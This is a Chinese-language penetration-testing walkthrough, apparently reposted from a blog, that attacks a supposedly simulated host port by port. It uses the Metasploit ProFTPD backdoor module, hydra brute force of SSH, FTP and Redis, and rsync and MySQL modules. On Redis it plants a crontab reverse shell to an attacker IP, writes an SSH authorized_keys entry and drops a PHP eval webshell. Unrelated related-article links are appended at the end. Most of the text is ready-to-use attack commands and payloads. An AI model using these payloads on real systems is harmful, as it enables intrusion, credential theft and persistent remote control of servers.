声明:文章渗透网站为模拟环境,文章只为利用过程

文章为信息收集和端口渗透两部分,21端口为ftp版本漏洞 8080端口为CMS的渗透

信息收集:

·使用扫描工具nmap ,PortScan 对整个网段进行扫描

信息:通过访问网站得到要测试的IP为192.168.31.69

该IP的中间件为Apache/2.4.7 目标系统为Ubuntu

开放的端口为21(ftp:ProFTPD 1.3.3c). 22(ssh).873 (rsync).3306(Mysql). 6379(Redis) .8080(Struts2)

访问80端口发现phpinfo页面  phpinfo可获得该IP网站的所有配置信息

测试过程

·21端口测试   查看到ftp的版本,搜索得知ftp为ProFTPD 1.3.3c存在后门漏洞

启动MSF的终端

msfconsole

搜索proFTPD的攻击模块,并载入

search proFTPD  //搜索proFTPD的攻击模块

use exploit/unit/ftp/proftpd_133c_backdoor  //载入选择模块

填写模块内容 并执行,之后反弹shell 就ok了

如果不知该填写什么参数可以 show一下

show options  //需要填写的信息

set RHOSTS 192.168.31.69  //目标IP

run  //执行

当然这只是针对ProFTPD 1.3.3c的利用过程,也可以使用暴力破解,但你的密码库要绝对的强大

·22端口测试   使用kali的工具hydra对目标IP的22端口进行暴力破解

爆破命令:

hydra -l(用户名) root -P(爆破字典) /usr/pass.txt(绝对路径,pass.txt为字典文件名,可以将自己的字典加入到该目录下)

-V(显示爆破过程)  -t(指定线程数)  10  ssh://127.0.0.1(如果是默认端口,可以不写,如果不是默认端口,要加端口xx,如ssh://127.0.0.1:xx)

暴力破解获得密码

获得用户及密码后可以使用ssh进行连接22端口

ssh 用户名@IP地址

这里介绍一下hydra的一些参数

参数:

-R 继续从上一次进度接着破解

-S 大写,采用SSL链接

-s 小写,可通过这个参数指定非默认端口

-l 指定破解的用户,对特定用户破解

-L 指定用户名字典

-p 小写,指定密码破解,少用,一般是采用密码字典

-P 大写,指定密码字典

-e 可选选项,n:空密码试探,s:使用指定用户和密码试探

-C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

-M 指定目标列表文件一行一条

-o 指定结果输出文件

-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

-t 同时运行的线程数,默认为16

-w 设置最大超时的时间,单位秒,默认是30s

-v /-V显示详细过程

各协议的具体命令:

格式+示例:

1、破解ssh:

hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh

hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp:

hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

参数说明:

-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止

·873端口测试  873端口为rsync服务存在未授权访问漏洞

启动MSF的终端

msfconsole

搜索rsync的攻击模块 并载入

search rsync  //搜索rsync的攻击模块

use auxiliary/scanner/rsync/modules_list  //载入要攻击的模块

show options  //需要填写的信息

set rhosts 192.168.31.69 //目标IP

run  //执行

可以通过命令达到未授权访问WWW文件夹

rsync root@192.168.31.69::

rsync root@192.168.31.69:WWW

·3306 端口测试   使用kali的工具进行暴力破解

这里暴力破解使用的还是metasploit frameword

老样子,先启动MSF的终端

msfconsole

因为3306为mysql的服务,所以要搜索关于mysql的模块

search mysql

之后载入选择的模块,我这里选择的是

use auxiliary/scanner/mysql/mysql_login

show option

填写参数,可以爆破出密码为123456

获得用户名及密码后可以通过其他模块进行执行sql语句

成功执行sql语句

·6379 端口测试  6379端口为redis服务,可能存在未授权访问漏洞

要测试redis服务需要在本地安装redis服务

安装:

wget http://download.redis.io/releases/redis-4.0.8.tar.gz     //下载地址

tar xzf redis-4.0.8.tar.gz   //解压下载文件

cd redis-3.2.0   //转到redis-3.2.0目录下

make   //到所在目录中安装

安装成功后需要配置一下文件,可以进行远程访问

vim redis.conf  //打开配置文件

在bind 127.0.0.1前面加上# ,  把protected-mode设为no

使用

先转到redis-3.2.0的src目录下

cd /root/redis-3.2.0/src

接着启动redis服务

./redis-cli -h 192.168.31.69

发现连接成功可以执行info

方法:

1)利用计划任务执行命令反弹shell

条件:在redis以root权限运行时可以写crontab来执行命令反弹shell

先在自己的服务器上监听一个端口:

nc -lvnp 4444

然后执行命令:

root@kali:~# redis-cli -h 192.168.31.69

192.168.31.69:6379>set x "\n* * * * * bash -i >& /dev/tcp/192.168.31.158/4444 0>&1\n"

ok

192.168.31.69:6379>config set dir /var/spool/cron/

ok

192.168.31.69:6379>config set dbfilename root

ok

192.168.31.69:6379>save

ok

去查看监听的端口,会反弹会shell

2)写ssh-keygen公钥然后使用私钥登陆

条件:Redis服务使用ROOT账号启动

服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器

首先需要在本生成密钥:

然后redis执行命令:

192.168.31.69:6379> config set dir /root/.ssh/
OK
192.168.31.69:6379> config set dbfilename authorized_keys
OK
192.168.31.69:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n"
OK
192.168.31.69:6379> save
OK

然后直接利用公钥登录ssh

ssh -i id_rsa root@192.168.31.69

3)写webshell

条件:开启web服务 且web目录有写入权限 知道绝对路径

192.168.31.69:6379>config set dir /var/www/html/

ok

192.168.31.69:6379>config set dbfilename shell.php

ok

192.168.31.69:6379>set x "<?php @eval($_POST['pass']);?>"

ok

192.168.31.69:6379>save

ok

4)使用hydra暴力破解redis密码

hydra -P passwd.txt redis://192.168.31.69

·8080端口测试  发现网站Struts 发现Struts可以使用Struts Scan工具获得指定漏洞交互式shell

下载Struts Scan:

git clone https://github.com/Lucifer1993/struts-scan   //下载

tar xzf struts-scan     //解压

cd struts-scan-master  //转到struts-scan-master 下

python struts-scan.py  //运行程序

扫描网站

python struts-scan.py http://192.168.31.69:8080/index.action

使用给出的漏洞交互shell     执行payload

转载于:https://www.cnblogs.com/G-Shadow/p/10981711.html

端口渗透·网站渗透过程 --21 ,22,873,3306,6379,8080(8080端口是针对CMS的渗透)...相关推荐

  1. 2008 r2 server 提权_某次Windows渗透提权过程

    0x01物色目标 大多数站点出于安全考虑,都会在robots.txt文件中屏蔽掉搜索引擎对敏感路径页面的爬取.robots文件里的敏感路径在针对一个目标渗透时可以帮助我们识别出重要页面,但它的存在不利 ...

  2. 记一次初级渗透测试模拟过程

    0x00 前言 网络安全攻防赛是一种国际流行的竞技模式,自2014年在国内升温,发展到现在,深受各大高校和安全企业的青睐.参赛者在竞技过程中能够更大的限度的收获专业知识.激发潜能.为了让更多人切身体会 ...

  3. 渗透测试php过程,利用骑士cms的一次纠结的渗透测试过程(两个潜在

    今天下载了骑士cms的最新版本,由于好久以前一个哥们发了一个后台拿shell的漏洞,还有别人发的一个sql注入的漏洞,一个有意思的渗透测试过程就从这两个地方开始了,成功的拿下了某大型人才网站的服务器, ...

  4. 记某hw中遇到的cms(PageAdmin CMS)渗透过程

    0x00前言 这是上周hw中遇到的一个cms,记录一下,防止以后遇到忘记利用点(手动狗头) 0x01介绍 PageAdmin Cms是一款基于asp.net mvc开发的自助建站系统,于2008年发布 ...

  5. 利用CMS漏洞渗透并获取某服务器权限

    利用CMS漏洞渗透并获取某服务器权限 在phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在p ...

  6. python pip scanless 在线端口扫描网站 匿名端口扫描工具 简介

    目录 scanless介绍 scanless安装与使用 scanless支持的在线端口扫描网站 在python中 库的使用方式 scanless介绍 官网地址:github.com/vesche/sc ...

  7. HTTP访问一个网站的过程详解

    访问一个网站的过程详解 例如访问:http://www.baidu.com HTTP请求的准备 浏览器会将www.baidu.com这个域名发送给DNS服务器,让它解析成IP地址.由于HTTP是基于T ...

  8. 秋色园网站转移过程记录篇

    前言: 昨夜断网了,早上把长宽的工作人员叫到家里来检测才发现,原来到期了,要续费交钱了. 昨夜断网时,无聊中就看了下某网友的给的DLL里的关于数据层多数据库的实现,看到一个槽点,本来想写写. 今天发现 ...

  9. 优化算法 | 基于粒子群优化算法的Bp神经网络预测21~22赛季NBA总冠军(附MATLAB代码)

    文章目录 前言 一.数据准备 二.基于PSO的Bp神经网络预测 1.粒子表达方式 2.目标函数 3.粒子速度和位置的更新 三.MATLAB代码 四.预测结果 五.代码获取方式 总结 近期你可能错过了的 ...

最新文章

  1. 在Mac上通过VMware Fushion 15.1配置静态IP虚拟机实录
  2. java1.8的特性,java1.8新特性
  3. 二十四、爬取古诗网中的100首古诗文
  4. linux gettimeofday()函数
  5. homebrew下安装mysql_Mac下homebrew安装Mysql以及配置问题
  6. php之is_null,PHP中is_null($x)和$x===null的简单比较
  7. js 正则清除html格式
  8. linux之终端的灵活使用。SCREEN
  9. Linux--内核Uevent事件机制 与 Input子系统
  10. 线程池的实现原理分析
  11. 【Python数据分析】二手车价格预测
  12. 嵌入式面试常见问题(六)—各大公司面试题
  13. java发微信_java实现微信发送消息
  14. 解决uniapp的 swiper 组件的随着指示点添加背景宽度不随着内容添加而自动扩大问题,而是溢出。
  15. 服务器装win10系统很卡,笔记本电脑安装win10系统后变很卡很慢的解决方法
  16. linux hid 设备驱动,linux hid驱动
  17. 解析雅虎与百度流氓原理-IE劫持
  18. Qt: 表格(QTableWidget)隐藏自动生成的序号列(行头)
  19. 【硬件工程师职业细分】揭秘硬件基带工程师
  20. 初学List和Set集合

热门文章

  1. 设计模式教程(Design Patterns Tutorial)笔记之一 创建型模式(Creational Patterns)...
  2. hdu 4284(状压dp)
  3. LeetCode(344)——反转字符串(JavaScript)
  4. 【jQuery学习】—jQuery对象的过滤
  5. python中如何移动图形工作站_如何在Python中使用Kriging插入工作站数据?
  6. 80后的你现在有多少资产?
  7. 六零后的人马上步入老年生活,没有退休金,如何养老?
  8. 什么是bigdata
  9. 订婚和结婚有什么区别
  10. 苹果是世界最高市值的公司,为什么苹果公司没有出现首富?